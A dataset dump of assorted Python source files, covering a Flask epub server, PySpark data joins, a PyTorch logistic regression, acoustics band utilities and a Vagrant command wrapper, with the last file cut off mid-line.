importlib.import_module(\"package-it\")\n\nLOG_FILE = '/data/logs/pubmin/pub-server.log'\n\nlogging.basicConfig(filename=LOG_FILE, format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\n\napp = Flask(__name__)\n\n#@app.after_request\ndef add_cors(response):\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['X-Authenticate-As'] = 'fal3rq3'\n return response\n\n@app.route('/')\ndef index():\n msg = {\"message\": \"index\"}\n return Response(json.dumps(msg), status=200, mimetype=\"application/json\")\n\n@app.route('/text')\ndef text():\n msg = \"teksti\"\n return Response(msg, status=200, mimetype=\"text/plain\")\n\n@app.route('/register', methods=['POST'])\ndef register():\n data = request.get_json()\n return Response(json.dumps(data), status=200, mimetype=\"application/json\")\n\n@app.route('/sample/', methods=['GET'])\ndef download_sample(nid):\n s = time.time()\n logging.info('id {} start.'.format(nid))\n book = '/data/books/samples/{}.sample.epub'.format(nid)\n headers = {}\n headers['X-Accel-Redirect'] = book\n headers['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(os.path.basename(book))\n logging.info(\"book {} end. took {} s\".format(book, str(time.time() - s) ))\n return Response(headers=headers)\n\n\nif __name__ == \"__main__\":\n\tapp.run(host=\"0.0.0.0\")\n\n","sub_path":"pub-server/pub-server.py","file_name":"pub-server.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438486321","text":"from Framework.screen.Navigation import move_to_reports, move_to_overview\nfrom Framework.utility.Constants import get_XPATH, get_projectLogger\nfrom Framework.utility.SeleniumWebScraper import SWS\n\n\n# Project constants\nlogger = get_projectLogger()\nXPATH = get_XPATH()\n\n\ndef read_all_new_reports(sws: SWS):\n \"\"\"\n Reads all new reports, does not store them.\n\n Parameters:\n - sws (SWS): Selenium Web Scraper.\n\n Returns:\n - True if operation was successful, False otherwise.\n \"\"\"\n ret = False\n UNREAD_REPORT_TEXT = '(unread)'\n if move_to_reports(sws):\n while sws.isVisible(XPATH.STRING_ON_SCREEN % UNREAD_REPORT_TEXT):\n if sws.clickElement(f\"{XPATH.STRING_ON_SCREEN % UNREAD_REPORT_TEXT}/*\", refresh=True):\n if not move_to_reports(sws, forced=True):\n logger.error('In read_all_new_reports: move_to_reports() failed')\n break\n else:\n logger.error('In read_all_new_reports: Failed to open report')\n break\n else:\n ret = True\n else:\n logger.error('In read_all_new_reports: move_to_reports() failed')\n # Return to Overview\n if move_to_overview(sws) and ret:\n logger.success('In read_all_new_reports: All new reports were read')\n else:\n ret = False\n logger.error('In read_all_new_reports: move_to_overview() failed')\n return ret\n","sub_path":"Framework/screen/Reports.py","file_name":"Reports.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11850464","text":"from __future__ import print_function\n\nimport sys\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, unix_timestamp, to_date, rank, sum, max, min\nfrom pyspark.sql.window import Window\n\nif __name__ == \"__main__\":\n\n spark = SparkSession.builder.appName('sp500_agg_join').getOrCreate()\n\n # reading in the data\n stock_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[1])\n stock_data = stock_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n stock_data = stock_data.toDF('Date',\n 'Symbol',\n 'Name',\n 'Close_Change',\n 'Close_LogChange',\n 'Close',\n 'Adj Close',\n 'High',\n 'Low',\n 'Open',\n 'Volume')\n\n max_date = stock_data.agg(max('Date')).collect()[0][0]\n min_date = stock_data.agg(min('Date')).collect()[0][0]\n\n stock_cumulative_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[2])\n stock_cumulative_data = stock_cumulative_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n stock_cumulative_data = stock_cumulative_data.select('Symbol',\n 'Date',\n 'CumulativeSum')\n stock_cumulative_data = stock_cumulative_data.toDF('Symbol',\n 'Date',\n 'Close_LogChangeCumulative')\n\n\n oxford_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[3]) \n oxford_data = oxford_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n oxford_data = oxford_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n oxford_data = oxford_data.toDF('Date',\n 'USA_StringencyIndex',\n 'USA_StringencyIndex_LogChange',\n 'USA_StringencyIndex_LogChangeCumulative',\n 'USA_StringencyLegacyIndex',\n 'USA_StringencyLegacyIndex_LogChange',\n 'USA_StringencyLegacyIndex_LogChangeCumulative',\n 'USA_GovernmentResponseIndex',\n 'USA_GovernmentResponseIndex_LogChange',\n 'USA_GovernmentResponseIndex_LogChangeCumulative',\n 'USA_ContainmentHealthIndex',\n 'USA_ContainmentHealthIndex_LogChange',\n 'USA_ContainmentHealthIndex_LogChangeCumulative',\n 'USA_EconomicSupportIndex',\n 'USA_EconomicSupportIndex_LogChange',\n 'USA_EconomicSupportIndex_LogChangeCumulative')\n\n john_hopkins_USA_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[4]) \n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n john_hopkins_USA_data = john_hopkins_USA_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n john_hopkins_USA_data = john_hopkins_USA_data.select('Date',\n 'Confirmed Cases',\n 'Cases Increase',\n 'Deaths',\n 'Deaths Increase')\n john_hopkins_USA_data = john_hopkins_USA_data.toDF('Date',\n 'USA Covid Confirmed Cases',\n 'USA Covid Cases LogChange',\n 'USA Covid Deaths',\n 'USA Covid Deaths LogChange')\n\n john_hopkins_world_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[5]) \n john_hopkins_world_data = john_hopkins_world_data.withColumn('Date', to_date(unix_timestamp(col('Date'), 'yyyy-MM-dd').cast('timestamp')))\n john_hopkins_world_data = john_hopkins_world_data.filter((col('Date') <= max_date) & (col('Date') >= min_date))\n john_hopkins_world_data = john_hopkins_world_data.select('Date',\n 'Confirmed Cases',\n 'Cases Increase',\n 'Deaths',\n 'Deaths Increase')\n john_hopkins_world_data = john_hopkins_world_data.toDF('Date',\n 'World Covid Confirmed Cases',\n 'World Covid Cases LogChange',\n 'World Covid Deaths',\n 'World Covid Deaths LogChange')\n\n news_data = spark.read.format('csv') \\\n .options(header='true', inferschema='false') \\\n .load(sys.argv[6]) \n news_data = news_data.withColumn('date', to_date(unix_timestamp(col('date'), 'yyyy-MM-dd').cast('timestamp')))\n news_data = news_data.filter((col('date') <= max_date) & (col('date') >= min_date))\n news_data = news_data.toDF('Date',\n 'News title--source')\n\n\n # John Hopkins cumulative increase calculations\n cum_window = Window.orderBy(john_hopkins_USA_data['Date']).rangeBetween(Window.unboundedPreceding, 0)\n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('USA Covid Cases LogChangeCumulative', sum('USA Covid Cases LogChange').over(cum_window))\n john_hopkins_USA_data = john_hopkins_USA_data.withColumn('USA Covid Deaths LogChangeCumulative', sum('USA Covid Deaths LogChange').over(cum_window))\n john_hopkins_USA_data = john_hopkins_USA_data.select('Date',\n 'USA Covid Confirmed Cases',\n 'USA Covid Cases LogChange',\n 'USA Covid Cases LogChangeCumulative',\n 'USA Covid Deaths',\n 'USA Covid Deaths LogChange',\n 'USA Covid Deaths LogChangeCumulative')\n\n cum_window = Window.orderBy(john_hopkins_world_data['Date']).rangeBetween(Window.unboundedPreceding, 0)\n john_hopkins_world_data = john_hopkins_world_data.withColumn('World Covid Cases LogChangeCumulative', sum('World Covid Cases LogChange').over(cum_window))\n john_hopkins_world_data = john_hopkins_world_data.withColumn('World Covid Deaths LogChangeCumulative', sum('World Covid Deaths LogChange').over(cum_window))\n john_hopkins_world_data = john_hopkins_world_data.select('Date',\n 'World Covid Confirmed Cases',\n 'World Covid Cases LogChange',\n 'World Covid Cases LogChangeCumulative',\n 'World Covid Deaths',\n 'World Covid Deaths LogChange',\n 'World Covid Deaths LogChangeCumulative')\n\n # joining all the data\n joined_data = stock_data.join(stock_cumulative_data, on=['Date', 'Symbol'], how='inner')\n joined_data = joined_data.select('Date',\n 'Symbol',\n 'Name',\n 'Close_Change',\n 'Close_LogChange',\n 'Close_LogChangeCumulative',\n 'Close',\n 'Adj Close',\n 'High',\n 'Low',\n 'Open',\n 'Volume')\n \n joined_data = joined_data.join(john_hopkins_USA_data, on=['Date'], how='outer') # outer\n\n joined_data = joined_data.join(john_hopkins_world_data, on=['Date'], how='outer') # outer\n \n joined_data = joined_data.join(oxford_data, on=['Date'], how='outer') # outer\n\n joined_data = joined_data.join(news_data, on=['Date'], how='outer') # outer\n\n joined_data = joined_data.orderBy(col('Date'), col('Symbol')) \n\n # writing out all the data\n header = [tuple(joined_data.columns)]\n header = spark.createDataFrame(header)\n joined_data = header.union(joined_data)\n joined_data.write.options(emptyValue='').csv('S&P_500_Aggregate_Join_Oxford_JohnHopkins_News.out')\n\n spark.stop()","sub_path":"spark/Joined Data/S&P_500_aggregate/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":9696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28568751","text":"import sys\n\nimport nltk\n\ndef main(repeat_times=3, include_tagging=False, sentence=None):\n nltk.download('punkt')\n nltk.download('averaged_perceptron_tagger')\n if not sentence:\n sentence = \"\"\"At eight o'clock on Thursday morning Arthur didn't feel very good.\"\"\"\n tokens = nltk.word_tokenize(sentence)\n for n in range(repeat_times):\n print(f\"repeat time: {n}\")\n print(tokens)\n if include_tagging:\n print(\"Including Tokens\")\n tagged = nltk.pos_tag(tokens)\n print(tagged[0:6])\n return \"Done\"\n\nif __name__ == \"__main__\":\n # We will get either json list of args, a json map of kwargs, both or neither.\n args, kwargs = [], {}\n if len(sys.argv) > 1:\n argvs = [json.loads(w) for w in sys.argv[1:]]\n args = [w for w in argvs if isinstance(w, list)]\n kwargs = [w for w in argvs if isinstance(w, dict)]\n if len(args) > 1 or len(kwargs) > 1 or len(sys.argv) > 3:\n raise ValueError(\"Only one json list (args) and/or one json map (kwargs) allowed.\")\n args = [] if not args else args[0]\n kwargs = {} if not kwargs else kwargs[0]\n main(*args, **kwargs)\n","sub_path":"main_with_reqs.py","file_name":"main_with_reqs.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427906965","text":"from .models import db\nfrom .models import Attorney, Courtroom, Defendant, DetainerWarrant, District, Judge, Plaintiff, detainer_warrant_defendants\nfrom .util import get_or_create, normalize, open_workbook, dw_rows, district_defaults\nfrom sqlalchemy.exc import IntegrityError, InternalError\nfrom sqlalchemy.dialects.postgresql import insert\nfrom decimal import Decimal\n\nDOCKET_ID = 'Docket #'\nFILE_DATE = 'File_date'\nSTATUS = 'Status'\nPLAINTIFF = 'Plaintiff'\nPLTF_ATTORNEY = 'Plaintiff_atty'\nCOURT_DATE = 'Court_date'\nRECURRING_COURT_DATE = 'Any_day'\nCOURTROOM = 'Courtroom'\nJUDGE = 'Presiding_judge'\nAMT_CLAIMED = 'Amount_claimed_num'\nAMT_CLAIMED_CAT = 'Amount_claimed_cat'\nIS_CARES = 'CARES'\nIS_LEGACY = 'LEGACY'\nNONPAYMENT = 'Nonpayment'\nADDRESS = 'Address'\nNOTES = 'Notes'\n\n\ndef normalize(value):\n if type(value) is int:\n return value\n elif type(value) is str:\n no_trailing = value.strip()\n return no_trailing if no_trailing not in ['', 'NA'] else None\n else:\n return None\n\n\ndef create_defendant(defaults, number, warrant):\n prefix = f'Def_{number}_'\n first_name = warrant[prefix + 'first']\n middle_name = warrant[prefix + 'middle']\n last_name = warrant[prefix + 'last']\n suffix = warrant[prefix + 'suffix']\n phones = warrant[prefix + 'phone']\n address = warrant[ADDRESS]\n\n defendant = None\n if bool(first_name) or bool(phones):\n defendant, _ = get_or_create(\n db.session, Defendant,\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n suffix=suffix,\n potential_phones=phones, address=address, defaults=defaults\n )\n return defendant\n\n\ndef link_defendant(docket_id, defendant):\n db.session.execute(insert(detainer_warrant_defendants)\n .values(detainer_warrant_docket_id=docket_id, defendant_id=defendant.id))\n\n\ndef _from_workbook_row(raw_warrant, defaults):\n warrant = {k: normalize(v) for k, v in raw_warrant.items()}\n\n docket_id = warrant[DOCKET_ID]\n file_date = warrant[FILE_DATE]\n status = warrant[STATUS]\n\n attorney = None\n if warrant[PLTF_ATTORNEY]:\n attorney, _ = get_or_create(\n db.session, Attorney, name=warrant[PLTF_ATTORNEY], defaults=defaults)\n\n plaintiff = None\n if warrant[PLAINTIFF]:\n plaintiff, _ = get_or_create(\n db.session, Plaintiff, name=warrant[PLAINTIFF], defaults=defaults)\n\n court_date = warrant[COURT_DATE]\n recurring_court_date = warrant[RECURRING_COURT_DATE]\n\n courtroom = None\n if warrant[COURTROOM]:\n courtroom, _ = get_or_create(\n db.session, Courtroom, name=warrant[COURTROOM], defaults=defaults)\n\n presiding_judge = None\n if warrant[JUDGE]:\n presiding_judge, _ = get_or_create(\n db.session, Judge, name=warrant[JUDGE], defaults=defaults)\n\n amount_claimed = Decimal(str(warrant[AMT_CLAIMED]).replace(\n '$', '').replace(',', '')) if warrant[AMT_CLAIMED] else None\n amount_claimed_category = warrant[AMT_CLAIMED_CAT] or 'N/A'\n is_cares = warrant[IS_CARES] == 'Yes' if warrant[IS_CARES] else None\n is_legacy = warrant[IS_LEGACY] == 'Yes' if warrant[IS_LEGACY] else None\n nonpayment = warrant[NONPAYMENT] == 'Yes' if warrant[NONPAYMENT] else None\n\n defendant = create_defendant(defaults, 1, warrant)\n defendant2 = create_defendant(defaults, 2, warrant)\n defendant3 = create_defendant(defaults, 3, warrant)\n\n notes = warrant[NOTES]\n\n dw_values = dict(docket_id=docket_id,\n file_date=file_date,\n status_id=DetainerWarrant.statuses[status],\n plaintiff_id=plaintiff.id if plaintiff else None,\n plaintiff_attorney_id=attorney.id if attorney else None,\n court_date='11/3/2020' if court_date == '11/3' else court_date,\n court_date_recurring_id=DetainerWarrant.recurring_court_dates[\n recurring_court_date.upper()] if recurring_court_date else None,\n courtroom_id=courtroom.id if courtroom else None,\n presiding_judge_id=presiding_judge.id if presiding_judge else None,\n amount_claimed=amount_claimed,\n amount_claimed_category_id=DetainerWarrant.amount_claimed_categories[\n amount_claimed_category.upper()],\n is_cares=is_cares,\n is_legacy=is_legacy,\n nonpayment=nonpayment,\n notes=notes,\n last_edited_by_id=-1\n )\n\n insert_stmt = insert(DetainerWarrant).values(\n **dw_values\n )\n\n do_update_stmt = insert_stmt.on_conflict_do_update(\n constraint=DetainerWarrant.__table__.primary_key,\n set_=dw_values\n )\n\n db.session.execute(do_update_stmt)\n db.session.commit()\n\n try:\n if defendant:\n link_defendant(docket_id, defendant)\n if defendant2:\n link_defendant(docket_id, defendant2)\n if defendant3:\n link_defendant(docket_id, defendant3)\n\n except IntegrityError:\n pass\n\n db.session.commit()\n\n\ndef from_workbook_help(warrants):\n defaults = district_defaults()\n\n for warrant in warrants:\n _from_workbook_row(warrant, defaults)\n\n\ndef from_workbook(workbook_name, limit=None, service_account_key=None):\n wb = open_workbook(workbook_name, service_account_key)\n\n warrants = dw_rows(limit, wb)\n\n from_workbook_help(warrants)\n","sub_path":"eviction_tracker/detainer_warrants/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114131929","text":"\n\nfrom xai.brain.wordbase.nouns._platter import _PLATTER\n\n#calss header\nclass _PLATTERS(_PLATTER, ):\n\tdef __init__(self,): \n\t\t_PLATTER.__init__(self)\n\t\tself.name = \"PLATTERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"platter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_platters.py","file_name":"_platters.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617514062","text":"from AcikHack import TextRank1, Summarize_Finder\r\nfrom AcikHack.Keyword_Search.summa import keywords\r\nfrom googletrans import Translator\r\n\r\n\r\ndef Key_words(text):\r\n tr4w = TextRank1.TextRank4Keyword()\r\n tr4w.analyze(text, candidate_pos=['NOUN', 'PROPN'], window_size=4, lower=False)\r\n q = tr4w.get_keywords(10)\r\n t = []\r\n q1 = []\r\n for word in keywords.keywords(text):\r\n if word != '\\n':\r\n t.append(word)\r\n else:\r\n q1.append(''.join(t))\r\n t = []\r\n print(q)\r\n print(q1)\r\n translator = Translator(service_urls=[\r\n 'translate.google.com'\r\n ])\r\n qTR = []\r\n q1TR = []\r\n trans = []\r\n for word in q:\r\n translations = translator.translate([word], dest='tr')\r\n for translation in translations:\r\n trans.append(translation.text)\r\n trans = ''.join(trans)\r\n qTR.append(trans)\r\n trans = []\r\n\r\n for word in q1:\r\n translations = translator.translate([word], dest='tr')\r\n for translation in translations:\r\n trans.append(translation.text)\r\n trans = ''.join(trans)\r\n q1TR.append(trans)\r\n trans = []\r\n\r\n print(qTR)\r\n print(q1TR)\r\n\r\n Summarize_Finder.Find_Summarize(text, qTR, q1TR) #degistircez turkce koy\r\n","sub_path":"AcikHack/Keywords_Finder.py","file_name":"Keywords_Finder.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"402638113","text":"import torch\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nimport numpy as np\n\nfrom torch.optim.optimizer import Optimizer, required\nimport torch.nn.functional as F\nimport time\n\n\nhhh = {}\nclass SGD(Optimizer):\n def __init__(self, params, lr=required, momentum=0, dampening=0,\n weight_decay=0, nesterov=False):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n defaults = dict(lr=lr)\n super(SGD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(SGD, self).__setstate__(state)\n\n def zero_grad(self):\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is not None:\n #print(\"grad: \"+str(type(p.grad))+' p: '+str(type(p)))\n #print(\"data: \" + str(type(p.data))+' grad data: '+str(type(p.grad.data)))\n p.grad.detach_()\n p.grad.zero_()\n p.data = hhh[p]\n\n def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n #print(p.data)\n\n #p.data = torch.from_numpy(np.ones_like(p.data.numpy()))\n new_data = p.data.clone().detach()\n new_data.add_(-group['lr'], d_p)\n hhh[p]=new_data\n #p.data.add_(-group['lr'], d_p)\n #print(p.data)\n\n return loss\n\nbatch_size = 100\nn_iters = 3000\ninput_dim = 784\noutput_dim = 10\nlr_rate = 0.001\n\ntrain_dataset = dsets.MNIST(root='./data', train=True, transform=transforms.ToTensor(), download=True)\ntest_dataset = dsets.MNIST(root='./data', train=False, transform=transforms.ToTensor())\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\nepochs = n_iters / (len(train_dataset) / batch_size)\n\n\nclass LogisticRegression(torch.nn.Module):\n def __init__(self, input_dim, output_dim):\n super(LogisticRegression, self).__init__()\n self.linear = torch.nn.Linear(input_dim, output_dim)\n\n def forward(self, x):\n #outputs = F.softmax(self.linear(x), dim = 1)\n outputs = self.linear(x)\n return outputs\n\n\n#model = torch.jit.script(LogisticRegression(input_dim, output_dim))\nmodel = LogisticRegression(input_dim, output_dim)\n#torch.jit.save(model,'lr.ndl')\n#model = torch.jit.load('lr.ndl')\ncriterion = torch.nn.CrossEntropyLoss() # computes softmax and then the cross entropy\n#criterion = torch.jit.script(torch.nn.CrossEntropyLoss()) # computes softmax and then the cross entropy\n\noptimizer = torch.optim.Adam(model.parameters(), lr=lr_rate)\n\nfor param in model.parameters():\n print(param.size())\nfor name, param in model.named_parameters():\n print(name)\n print(param.size())\n\niter_num = 0\nstart_time = time.time()\nb = 0\nfor epoch in range(int(epochs)):\n for i, (images, labels) in enumerate(train_loader):\n images = Variable(images.view(-1, 28 * 28))\n labels = Variable(labels)\n\n optimizer.zero_grad()\n a = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n b += time.time() - a\n optimizer.step()\n\n iter_num+=1\n if iter_num%500==0:\n # calculate Accuracy\n print(time.time() - start_time)\n print('model: ',b)\n start_time = time.time()\n correct = 0\n total = 0\n for images, labels in test_loader:\n images = Variable(images.view(-1, 28*28))\n outputs = model(images)\n tmp, predicted = torch.max(outputs.data, 1)\n print(tmp,predicted)\n total+= labels.size(0)\n # for gpu, bring the predicted and labels back to cpu fro python operations to work\n correct+= (predicted == labels).sum()\n accuracy = 100 * correct/total\n print(\"Iteration: {}. Loss: {}. Accuracy: {}.\".format(iter_num, loss.item(), accuracy))\n","sub_path":"lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311553699","text":"\"\"\"\nBands\n=====\n\n\n\n\"\"\"\n\n\nfrom __future__ import division\n\nimport numpy as np\n\nfrom acoustics.utils import esum\n\nOCTAVE_CENTER_FREQUENCIES = np.array([16, 31.5, 63, 125, 250, 500,\n 1000, 2000, 4000, 8000, 16000])\n\"\"\"\nPreferred 1/1-octave band center frequencies.\n\"\"\"\n\nTHIRD_OCTAVE_CENTER_FREQUENCIES = np.array([12.5, 16, 20, 25, 31.5, 40,\n 50, 63, 80, 100, 125, 160,\n 200, 250, 315, 400, 500, 630,\n 800, 1000, 1250, 1600, 2000, 2500,\n 3150, 4000, 5000, 6300, 8000, 10000,\n 12500, 16000, 20000])\n\"\"\"\nPreferred 1/3-octave band center frequencies.\n\"\"\"\n\n\ndef octave(first, last):\n \"\"\"\n Generate a Numpy array for central frequencies of octave bands.\n\n There are more information on how to calculate 'real' bands in\n http://blog.prosig.com/2006/02/17/standard-octave-bands/\n\n Parameters\n ----------\n first : scalar\n First octave centerfrequency.\n\n last : scalar\n Last octave centerfrequency.\n\n Returns\n -------\n octave_bands : array\n An array of centerfrequency octave bands.\n \"\"\"\n octave_bands = OCTAVE_CENTER_FREQUENCIES\n low = np.where(octave_bands == first)[0]\n high = np.where(octave_bands == last)[0]\n return octave_bands[low: high+1]\n\n\ndef octave_low(first, last):\n return octave(first, last)/np.sqrt(2.0)\n\n\ndef octave_high(first, last):\n return octave(first, last)*np.sqrt(2.0)\n\n\ndef third(first, last):\n \"\"\"\n Generate a Numpy array for central frequencies of third octave bands.\n\n Parameters\n ----------\n first : scalar\n First third octave centerfrequency.\n\n last : scalar\n Last third octave centerfrequency.\n\n Returns\n -------\n octave_bands : array\n An array of centerfrequency third octave bands.\n \"\"\"\n third_oct_bands = THIRD_OCTAVE_CENTER_FREQUENCIES\n low = np.where(third_oct_bands == first)[0]\n high = np.where(third_oct_bands == last)[0]\n return third_oct_bands[low: high+1]\n\n\ndef third_low(first, last):\n return third(first, last)/2.0**(1.0/6.0)\n\n\ndef third_high(first, last):\n return third(first, last)*2.0**(1.0/6.0)\n\n \ndef third2oct(levels, axis=None):\n \"\"\"\n Calculate Octave levels from third octave levels.\n \n :param levels: Array containing third octave levels.\n :type: :class:`np.ndarray`\n :param axis: Axis over which to perform the summation. \n :type axis: :class:`int`\n \n :returns: Third octave levels\n :rtype: :class:`np.ndarray`\n \n .. note:: The number of elements along the summation axis should be a factor of 3.\n \"\"\"\n \n levels = np.array(levels)\n axis = axis if axis is not None else levels.ndim - 1\n \n try:\n assert(levels.shape[axis]%3 == 0)\n except AssertionError: \n raise ValueError(\"Wrong shape.\")\n shape = list(levels.shape)\n shape[axis] = shape[axis] // 3\n shape.insert(axis+1, 3)\n levels = np.reshape(levels, shape)\n return esum(levels, axis=axis+1)\n\ndef _check_band_type(freqs):\n \"\"\"Check if an array contains octave or third octave bands values sorted\n or unsorted.\n \"\"\"\n octave_bands = octave(16, 16000)\n third_oct_bands = third(12.5, 20000)\n\n def _check_sort(freqs, bands):\n index = np.where(np.in1d(bands, freqs))[0]\n band_pos = index - index[0]\n if (band_pos == np.arange(band_pos.size)).all():\n sorted = True\n else:\n sorted = False\n return sorted\n\n if np.in1d(freqs, octave_bands).all() == True:\n is_sorted = _check_sort(freqs, octave_bands)\n if is_sorted is True:\n band_type = 'octave'\n else:\n band_type = 'octave-unsorted'\n elif np.in1d(freqs, third_oct_bands).all() == True:\n is_sorted = _check_sort(freqs, third_oct_bands)\n if is_sorted is True:\n band_type = 'third'\n else:\n band_type = 'third-unsorted'\n else:\n band_type = None\n\n return band_type\n","sub_path":"acoustics/bands.py","file_name":"bands.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397663964","text":"# Chapter 17 - Multivariate Statistics\nimport numpy as np\n\nv = np.array([1, 2, 3, 4, 5, 6])\n\nprint(v)\n\nresult = np.mean(v)\nprint(result)\n\nM = np.array([\n [1, 2, 3, 4, 5, 6],\n [1, 2, 3, 4, 5, 6]\n\n])\n\ncol_mean = np.mean(M, axis=0)\nprint(col_mean)\n\nrow_mean = np.mean(M, axis=1)\nprint(row_mean)\n\n# variance\n\nv = np.array([1, 2, 3, 4, 5, 6])\n\nresult = np.var(v, ddof=1)\nprint(result)\n\nM = np.array([\n [1, 2, 3, 4, 5, 6],\n [1, 2, 3, 4, 5, 6]])\nprint(M)\n# column standard deviations\ncol_std = np.std(M, ddof=1, axis=0)\nprint(col_std)\n# row standard deviations\nrow_std = np.std(M, ddof=1, axis=1)\nprint(row_std)\n\n#covariance\n\nx = np.array([1,2,3,4,5,6,7,8,9])\nprint(x)\n\ny = np.array([9,8,7,6,5,4,3,2,1])\nprint(y)\n\nSigma = np.cov(x,y)[0,1]\nprint(Sigma)\n\n\ncorr = np.corrcoef(x,y)[0,1]\nprint(corr)\n\n\n#covariance matrix\n# covariance matrix\nfrom numpy import array\nfrom numpy import cov\n# define matrix of observations\nX = array([\n[1, 5, 8],\n[3, 5, 11],\n[2, 4, 9],\n[3, 6, 10],\n[1, 5, 10]])\nprint(X)\n# calculate covariance matrix\nSigma = cov(X.T)\nprint(Sigma)\n\n","sub_path":"ch17/ch17.py","file_name":"ch17.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521451874","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n# Authors:\n# Pavel Březina \n#\n# Copyright (C) 2019 Red Hat\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nimport os\nimport re\nimport sys\nimport shutil\nimport hashlib\nimport argparse\nimport datetime\nimport textwrap\nimport subprocess\n\nfrom utils import *\n\nif len(sys.argv) >= 2 and sys.argv[1] != 'provision-host':\n from vagrant_cloud import *\n\n\nclass Command:\n def __init__(self, subparser, name, help):\n self.dir = os.path.dirname(os.path.realpath(__file__)) + '/..'\n self.pool = '%s/pool' % self.dir\n self.shell = Shell(self.dir)\n self.vagrant = Vagrant(self.dir)\n self.ansible = Ansible(self.dir)\n self.linux = ['ipa', 'ldap', 'client']\n self.windows = ['ad', 'ad-child']\n self.guests = self.windows + self.linux\n\n self.name = name\n self.parser = subparser.add_parser(name, help=help, description=help)\n self.parser.set_defaults(func=self.run)\n\n def run(self, args, params=[]):\n raise NotImplementedError()\n\n\nclass BasicVagrantCommand(Command):\n def __init__(self, subparser, name, help, command=None):\n super().__init__(subparser, name, help)\n\n self.command = [self.name] if command is None else command\n\n self.parser.add_argument(\n '--all', action='store_const', dest='guests',\n const=self.guests, help='Run command on all machines (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Run command on AD machine'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Run command on AD child machine'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Run command on IPA machine'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Run command on LDAP machine'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Run command on client machine'\n )\n\n self.parser.add_argument(\n '-s', '--sequence', action='store_true', dest='sequence',\n help='Run operation on guests in sequence (one by one)'\n )\n\n def run(self, args, params=[]):\n runon = []\n\n if args.guests is None:\n args.guests = self.guests\n\n for guest in args.guests:\n runon.append(guest)\n\n if args.sequence:\n for guest in runon:\n self.vagrant.run(self.command + [guest], params)\n return\n\n self.vagrant.run(self.command + runon, 